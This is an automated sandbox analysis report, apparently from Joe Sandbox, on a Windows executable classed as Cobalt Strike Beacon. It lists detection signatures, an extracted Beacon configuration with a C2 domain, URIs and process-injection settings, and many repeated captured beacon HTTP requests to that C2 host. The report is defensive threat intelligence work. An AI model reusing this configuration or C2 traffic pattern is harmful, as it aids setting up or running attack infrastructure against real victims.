Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Analysis ID:	1428763
MD5:	c720c50306558112b389ef44cff494f1
SHA1:	476f36c3f3a3aa0141b481fb683d3c0cbd767def
SHA256:	6b655ddf0b5cda5d24b62d2f387e0f83e57b7a931f55f49ad274b002c1a68b23
Tags:	exe
Infos:

Detection

CobaltStrike

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Sets debug register (to hijack the execution of another thread)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to query locales information (e.g. system language)

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Signatures

AV Detection

Found malware configuration

Source: 00000000.00000003.2073190217.000000000208E000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 62, "MaxGetSize": 2796804, "Jitter": 81, "C2Server": "easthoolbook.com,/sign.mpeg", "HttpPostUri": "/flexible", "Malleable_C2_Instructions": ["Remove 600 bytes from the beginning", "Base64 decode", "NetBIOS decode 'A'"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpresult.exe", "Spawnto_x64": "%windir%\\sysnative\\gpresult.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 12345, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 22918, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

ReversingLabs: Detection: 25%

Source: unknown	HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49748 version: TLS 1.2

Source:

Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_000000014003C388 GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

0_2_000000014003C388

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: easthoolbook.com

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AVANTI-UK-ASGB AVANTI-UK-ASGB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
